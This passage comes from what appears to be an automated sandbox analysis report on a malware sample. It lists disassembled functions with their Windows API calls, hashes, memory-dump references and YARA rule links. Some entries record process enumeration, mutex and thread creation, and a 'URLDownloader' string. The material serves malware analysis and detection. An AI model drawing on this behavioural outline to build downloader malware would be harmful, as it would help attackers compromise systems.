                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
                                                                                                  • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 4206206407-0
                                                                                                  • Opcode ID: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                  • Instruction ID: ed5e708f9a507b4adfd911d3508ec20c212b5a391fedcf247e80062d61f76bb5
                                                                                                  • Opcode Fuzzy Hash: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                  • Instruction Fuzzy Hash: C531C5F9E00108BBDB04EFA4D89599D7BB6EF54244F008069F9069F242EB31EAD5CB95
                                                                                                  Function 10004EE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1216362210-0
                                                                                                  • Opcode ID: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                  • Instruction ID: b6c0c3fe9f7a8ecbfd6a68903a988b9ee954c4047185b56f79f4f3260df6d144
                                                                                                  • Opcode Fuzzy Hash: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                  • Instruction Fuzzy Hash: 71312FB5E40208BFEB14DBD8CC86FAEB7B5EB48710F204254F615AB2C0D671AB408B55
                                                                                                  Function 008D1F77 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008D1F84
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 008D1FC5
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 008D1FEC
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?), ref: 008D202C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1100011785-0
                                                                                                  • Opcode ID: ad4cc8196aeaec05983c793c26f6bcab303a0f1f4c84ce765135adf8375fdcb0
                                                                                                  • Instruction ID: 56e0133e809c5604f7c6c117e1a27ce243a5da3fdbf5cffbcb88a21ca850ea0d
                                                                                                  • Opcode Fuzzy Hash: ad4cc8196aeaec05983c793c26f6bcab303a0f1f4c84ce765135adf8375fdcb0
                                                                                                  • Instruction Fuzzy Hash: 57216071904218BBDB20DBE4CC89FEEB778EB18711F108289F605E62D0D7749B49DB61
                                                                                                  Function 008E5DC7 Relevance: 9.0, APIs: 6, Instructions: 41synchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 008E5DE1
                                                                                                  • GetLastError.KERNEL32 ref: 008E5DEA
                                                                                                  • CloseHandle.KERNEL32(?), ref: 008E5DFB
                                                                                                  • GetCurrentThread.KERNEL32 ref: 008E5E13
                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 008E5E1A
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 008E5E2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3416154964-0
                                                                                                  • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction ID: 6d64b876953bb19cb699e803bcb042b324546c826c2b09a0bcd7f9f752857c95
                                                                                                  • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction Fuzzy Hash: 8A01447068471CFBF791ABF48C4EB5D3A64EB09706F104450F709EA1D0DAB4D7448B25
                                                                                                  Function 10011A40 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                                  • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                                  • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1074265955-0
                                                                                                  • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                  • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                                  • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                  • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                                  Function 008E6548 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: dllmain_raw$Main@12
                                                                                                  • String ID:
                                                                                                  • API String ID: 2964726511-0
                                                                                                  • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                  • Instruction ID: b15ebecdada4f7a35fc6c4c9f191828b41ff2b54bc5dd741f42104f49dd7496c
                                                                                                  • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                  • Instruction Fuzzy Hash: 1D218371E00299ABDB219F1BCC41A6F7A69FBB2BD4B158125F815E7224E3308D619BD0
                                                                                                  Function 10015FE6 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                                  • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                                  • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                                  • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 1722040371-0
                                                                                                  • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                  • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                                  • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                  • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                                  Function 10015F31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                                  • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                  • String ID: URLDownloader
                                                                                                  • API String ID: 1466638765-1891997712
                                                                                                  • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                  • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                                  • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                  • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                                  Function 008D4EB7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 008D4ECE
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 008D4F28
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 008D4F40
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 008D4F8C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                  • Instruction ID: db97df3be1912b4587aafe772c44d6cae73165b6fd5ff4748f986f432d7c34ab
                                                                                                  • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                  • Instruction Fuzzy Hash: CE31EFB5E40208BFEB14DBD8CD86FAEB7B5EB49710F204254F615AB3D0D6B1AB008B55
                                                                                                  Function 10013A70 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1566052064-0
                                                                                                  • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                  • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                                  • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                  • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                                  Function 100163BC Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                                    • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                                  • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                                  • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                  • String ID:
                                                                                                  • API String ID: 590286634-0
                                                                                                  • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                  • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                                  • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                  • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                                  Function 10011F50 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2950233615-0
                                                                                                  • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                  • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                                  • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                  • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                                  Function 10012C30 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                                  • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3089488326-0
                                                                                                  • Opcode ID: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                  • Instruction ID: 718b455e6a9fe28b5531d214fab6855221ed4fdccad38d515428ce19cb46a070
                                                                                                  • Opcode Fuzzy Hash: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                  • Instruction Fuzzy Hash: 97F0AF74901108EFCB48DF98CD9599EB7B6FF48305B20819AE406A3351DB31AF15DB54
                                                                                                  Function 008E6BCB Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 008E6BDD
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008E6BEC
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 008E6BF5
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 008E6C02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                  • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                  Function 10005540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                                  • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                  • String ID: .exe
                                                                                                  • API String ID: 2188046178-4119554291
                                                                                                  • Opcode ID: 3b2a378ae6b5d3c41a68bce81ab8d2cf5858c1a4f11638c67dec6678d81bd9d9
                                                                                                  • Instruction ID: 322e95b2db96aea7f088eda3d8bee12a526519093e635f9f9e857dc9ab2affb0
                                                                                                  • Opcode Fuzzy Hash: 3b2a378ae6b5d3c41a68bce81ab8d2cf5858c1a4f11638c67dec6678d81bd9d9
                                                                                                  • Instruction Fuzzy Hash: 15513774C04248EFEB15CBA4CC91BEEBBB5EF15300F148199E1167B296DB746B48CBA1
                                                                                                  Function 10015F82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
